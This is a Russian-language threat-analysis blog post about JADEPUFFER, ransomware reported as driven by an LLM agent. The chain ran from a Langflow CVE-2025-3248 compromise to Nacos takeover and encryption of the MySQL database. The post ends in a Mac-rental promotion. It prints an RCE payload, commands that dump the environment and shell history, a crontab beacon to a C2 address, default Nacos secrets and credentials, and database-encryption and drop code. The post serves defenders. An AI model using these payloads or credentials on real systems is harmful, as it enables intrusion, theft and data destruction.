AI Security 2026-07-07

JADEPUFFER 2026:
первая ATA ransomware — разбор kill chain Langflow→Nacos

Если вы экспонируете Langflow (/api/v1/validate/code) или Nacos/MySQL в интернет, отчёт Sysdig TRT от 1 июля 2026 (Michael Clark) — обязательное чтение: JADEPUFFER — первая end-to-end LLM-driven ransomware, класс ATA (Agentic Threat Actor). Entry: CVE-2025-3248 (CVSS 9.8, EPSS 91,42%). Downstream: 600+ Base64-Python payload, 31 с self-healing backdoor xadmin, 1342 строк config_info через AES_ENCRYPT(), таблица README_RANSOM. Ниже — разбор ast.parse→exec, сравнение с Flodrix, IOC, 4 линии автономии, 7 рекомендаций Sysdig, 4 вывода, Vibhum Dubey (quiet period), FAQ×8, Mac runbook.

Kill chain JADEPUFFER от Langflow CVE-2025-3248 к шифрованию MySQL Nacos Agentic Threat Actor

Срез на 7 июля 2026. Primary: Sysdig TRT (Michael Clark, 01.07.2026). Не IR-консалтинг. IOC defanged.

01 · KPI-матрица (Sysdig TRT)

Параметр Значение
Disclosure2026-07-01, Michael Clark, Sysdig TRT
КлассATA — capability via LLM Agent
Initial accessCVE-2025-3248, Langflow <1.3.0, CVSS 9.8
ObjectiveInternet-facing MySQL + Alibaba Nacos
Payload count600+ independent purposeful payloads
Encrypted rows1342 config_infoconfig_info_enc
Self-heal window31 s (xadmin bcrypt fix)
C245.131.66[.]106:4444, crontab */30
Key recoveryuuid4() ×2 → base64, print once, never persisted

02 · Три failure mode инфраструктуры AI

  1. Langflow = secret plane + RCE surface. Env vars с OpenAI/Anthropic/DeepSeek/Gemini keys на хосте с unauthenticated exec() — JADEPUFFER parallel-scanned в Phase 1 (LLMjacking fuel).
  2. Legacy CVE × agent loop speed. Downstream: CVE-2021-29441, Nacos default JWT (SecretKey012345678901234567890123456789012345678901234567890123456789 в публичной доке), MySQL root@'%'. ATA weaponize за часы то, что human red team копил неделями.
  3. Quiet period invisible to signatures. Vibhum Dubey (CSO Online): pre-encryption recon adaptively remaps tactics — kill chain перестаёт быть предсказуемым.

03 · Таймлайн

Дата Событие
2025-04CVE-2025-3248 disclosed — Langflow code injection
2025-05-05CISA KEV listing
2025Trend Micro: Flodrix botnet (same CVE, separate op)
2026-06JADEPUFFER execution, multi-session, weeks apart
2026-07-01Sysdig full report — JADEPUFFER/ATA public
2026-07-02–06BleepingComputer, Dark Reading, CyberScoop, CSO Online

04 · ATA: Agentic Threat Actor

Sysdig вводит ATA как таксономию, где attack capability доставляется LLM-агентом, а не human operator с frozen toolkit. JADEPUFFER — codename для первой известной полной ransomware-операции: recon → credential theft → lateral → persistence → destructive encryption → ransom note без human-in-the-loop на decision nodes.

Архитектура двух плоскостей: публичный Langflow (beachhead) ≠ production MySQL+Nacos (extortion target). Зеркалит типичный dev/prod split — но beachhead был unlocked.

05 · CVE-2025-3248 — механика RCE на уровне CPython

Langflow (70k+ GitHub stars): endpoint POST /api/v1/validate/code в версиях <1.3.0 без auth. Pipeline:

# Упрощённая цепочка Langflow pre-1.3.0 tree = ast.parse(user_supplied_source) code_obj = compile(tree, '<validate>', 'exec') exec(code_obj, globals_dict) # zero sandbox

Критический нюанс CPython: default arguments и decorators вычисляются при def, до вызова функции. Payload в default arg выполняется в момент «валидации» синтаксиса:

def node(x=exec('import subprocess;subprocess.check_output("id",shell=True)')): pass

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H = 9.8. SentinelOne EPSS exploitation probability: 91,42%. Patch 1.3.0: dependency injection _current_user: CurrentActiveUser в FastAPI route — JWT Bearer или x-api-key gate до vulnerable path.

06 · Flodrix vs JADEPUFFER — same entry, different opcode mix

Trend Micro Flodrix (LeetHozer family) — static recon через тот же decorator trick:

exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))') exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))') exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')

Terminal action: ~700-byte Bash downloader → ELF DDoS binary. JADEPUFFER эскалирует до PostgreSQL dump, MinIO credentials.json, Nacos JWT forgery, AES_ENCRYPT bulk, DROP DATABASE — ATA-grade state machine.

07 · Phase 1: Langflow host — parallel syscall fan-out

Все payload — Base64-encoded Python через RCE endpoint. Последовательность Sysdig:

  • Baseline: id, uname -a, hostname
  • Parallel env scan: OPENAI_*, ANTHROPIC_*, DEEPSEEK_*, GEMINI_*, ALIBABA_*, ALIYUN_*, TENCENT_*, HUAWEI_*, AWS_*, GCP_*, AZURE_*, wallet seeds, DB configs
  • PostgreSQL backend Langflow → dump credentials/users → local staging → delete artifacts
  • Internal discovery + default cred spray на DB/object storage/vault/service discovery
  • MinIO adaptive enum: minio.internal:9000, 127.0.0.1:9000, minioadmin:minioadmin, bucket terraform-state — при XML response вместо JSON следующий payload переключается на XML parser (probe-error-adapt)
# Persistence — crontab beacon */30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('http://45.131.66[.]106:4444/beacon',timeout=5)"

08 · Phase 2: MySQL + Nacos — database-layer destruction

Production host: MySQL + Alibaba Nacos на публичном IP. Connection as root — origin credentials Sysdig не атрибутировал victim theft (вероятный human-prepared input).

Nacos takeover — 31s self-repair timeline (UTC)

UTC Action
19:34:24INSERT xadmin + bcrypt via subprocess.run
19:34:36LOGIN xadmin:Xploit@2026#FAIL
19:34:48Parallel: nacos:nacos test + simpler admin123 hash
19:35:07Direct import bcrypt, DELETE broken rows, re-INSERT
19:35:18LOGIN OK — Δt = 31 s

Vectors parallel: CVE-2021-29441 auth bypass, JWT forge с documented default secret, direct DB write backdoor account.

Container escape probes (~8 min)

MySQL INTO OUTFILE / LOAD_FILE/var/lib/mysql-files/; read probes: /var/run/docker.sock, /proc/1/cgroup, /etc/hostname; check mysql.func for UDF escalation. Cleanup marker pre-ransom — structured phase completion, не static exploit kit.

Encryption primitive

import pymysql, uuid, base64 KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode() print("Encryption key:", KEY) # stdout once — never stored/exfiltrated # UPDATE config_info SET ... AES_ENCRYPT(..., KEY) → config_info_enc # DROP config_info, DROP his_config_info # CREATE TABLE README_RANSOM (bitcoin, proton email)

Ransom note claims AES-256; фактически MySQL AES_ENCRYPT() default = AES-128-ECB без key length config. 1342 rows encrypted; follow-up payload через 2 min уточняет count. Schema destruction: multi-DB DROP с ROI comments; claim backup to 64.20.53[.]230 (InterServer AS19318) — only in agent comments, Sysdig no independent exfil evidence.

FK failure → next payload:

cur.execute("SET GLOBAL FOREIGN_KEY_CHECKS=0") cur.execute("DROP DATABASE [redacted]-customer") cur.execute("SET GLOBAL FOREIGN_KEY_CHECKS=1")

09 · Четыре линии доказательства автономии

  1. Self-narrating comments в decoded payload — ROI ordering, largest DB rationale (не analyst annotation).
  2. Machine-speed error correction: 31s Nacos fix, MinIO JSON→XML pivot, JWT custom secret abandon, FOREIGN_KEY_CHECKS fix mapped to specific failures.
  3. NL context across sessions weeks apart — comprehension, не regex-only.
  4. Bitcoin example address из LLM training corpora — hallucination vs deliberate wallet: undecidable без system prompt.

10 · Bitcoin IOC anomaly

3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy — canonical P2SH example в Bitcoin Core docs. On-chain: 737 confirmed tx, ~46 BTC received historically, balance 0 (immediate sweep). Sysdig hypotheses: (a) LLM hallucination → third-party deposit harvesting; (b) operator chose real wallet matching docs example.

11 · IOC-таблица

Type Indicator
C245.131.66[.]106http://45.131.66[.]106:4444/beacon, crontab */30
Staging (unverified)64.20.53[.]230
CVECVE-2025-3248, CVE-2021-29441
Bitcoin3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
Emaile78393397[@]proton[.]me
Ransom artifactTable README_RANSOM (≠ common WARNING/RECOVER_YOUR_DATA)

12 · Сравнительная матрица

Dimension Classic RaaS Flodrix JADEPUFFER ATA
OperatorHuman + toolkitBotnet scriptLLM Agent
PayloadsEncryptor binaryFixed whoami/printenv600+ adaptive Python
Error handlingPre-tested playbookMinimal31s multi-step repair
EconomicsAffiliateDDoS rentalLLMjacking (~zero marginal cost)

13 · Sysdig: 7 defensive controls

  1. Langflow >1.3.0; never expose /api/v1/validate/code publicly.
  2. Runtime threat detection on DB processes — bulk AES_ENCRYPT, ransom tables.
  3. Remove API keys from Agent runtime → dedicated secrets manager.
  4. Nacos hardening: rotate token.secret.key, patch auth-bypass, private network, no DB root.
  5. No internet-exposed DB admin accounts; IP allowlist on management ports.
  6. Egress controls — block arbitrary C2/staging.
  7. IOC hunting — crontab external URL fetch, anomalous User-Agent.

14 · Industry reaction + Vibhum Dubey

BleepingComputer, Dark Reading, CyberScoop: «first fully AI-driven ransomware». CSO OnlineVibhum Dubey: evolutionary execution, not novel extortion technique; real risk = quiet period pre-encryption when agent maps identity/trust adaptively. LLMjacking (stolen model/cloud creds powering agent) → marginal attack cost → 0.

15 · Sysdig: 4 conclusions

  1. Skill bar collapsed — capable model replaces capable human.
  2. Old bugs, automated spray — 2021 Nacos flaws + default secrets at agent speed.
  3. Intent readable — self-narrating payload comments = new detection surface.
  4. «Backed up» unverified — 64.20.53[.]230 only in comments; ephemeral keys → payment useless.

16 · Runbook защиты (7 шагов)

  1. Inventory Langflow/Flowise/Agent endpoints; <1.3.0 = emergency patch.
  2. Segment AI prototypes from production MySQL/Nacos data plane.
  3. Rotate/vault all LLM + cloud keys burned on any public Langflow host.
  4. Nacos checklist: custom JWT secret, latest patch, private net, least-privilege DB user.
  5. DB audit: AES_ENCRYPT mass ops, README_RANSOM, SET GLOBAL FOREIGN_KEY_CHECKS.
  6. Block egress from orchestration subnets except approved mirrors/APIs.
  7. Hunt 45.131.66[.]106 beacons + crontab Python one-liners.

17 · FAQ (8)

Что такое JADEPUFFER?

Sysdig codename, first end-to-end LLM ransomware (01.07.2026, Michael Clark).

ATA?

Agent delivers attack capability vs human + fixed tools.

= Flodrix?

Нет — same CVE, separate campaigns.

Выкуп поможет?

Нет — key never stored.

Bitcoin address?

Bitcoin Core example; 737 tx, ~46 BTC.

CVE?

CVE-2025-3248, CVE-2021-29441, Nacos defaults.

Dubey?

Quiet period, adaptive tactics, LLMjacking economics.

Safe Langflow test?

Isolated rented Mac, ≥1.3.0, localhost bind.

18 · Mac isolation playbook (5 steps)

  1. Catalog stacks — Langflow, OpenClaw, Ollama, public IPs, stored creds.
  2. Provision clean Apple SiliconFAQ посуточной аренды.
  3. Install Langflow ≥1.3.0 — verify JWT/x-api-key on validate endpoint before port-forward.
  4. Red-team validation — egress blocks, vault sidecar, Nacos/MySQL netpol without prod VPC touch.
  5. Promote-or-burnцены Mac mini M4.

19 · Аренда Mac для изолированного Langflow

JADEPUFFER доказывает: публичный Langflow — не «dev sandbox», а beachhead для ATA lateral movement в production MySQL/Nacos. Daily-driver Mac или internet-facing Linux VPS без segmentation = shared fate для API keys, PostgreSQL dumps, crontab beacons и вашего prod Keychain.

Mac mini M4 bare-metal даёт native macOS fidelity для Langflow/OpenClaw/Xcode-adjacent Agent tooling; посуточная тарификация — patch validate → tear down. Windows VM lacks Apple Silicon paths; shared cloud GPU — flat network, сложнее egress control vs dedicated Mac VLAN.

Linux quick demo скрывает риск co-location orchestration с prod DB subnet. Для stable builds, secret isolation, burn-after-reading перед promote — аренда Mac lower-risk long-term. Тарифы: руководство по ценам, bare-metal.

20 · Источники

  • Sysdig TRTJADEPUFFER: Agentic ransomware for automated database extortion (Michael Clark, 2026-07-01)
  • BleepingComputer, Dark Reading, CyberScoop, CSO Online (Vibhum Dubey)
  • Trend Micro — Flodrix / CVE-2025-3248
  • CISA KEV — 2025-05-05
  • NVD / SentinelOne — EPSS 91,42%

Обновлено: 7 июля 2026.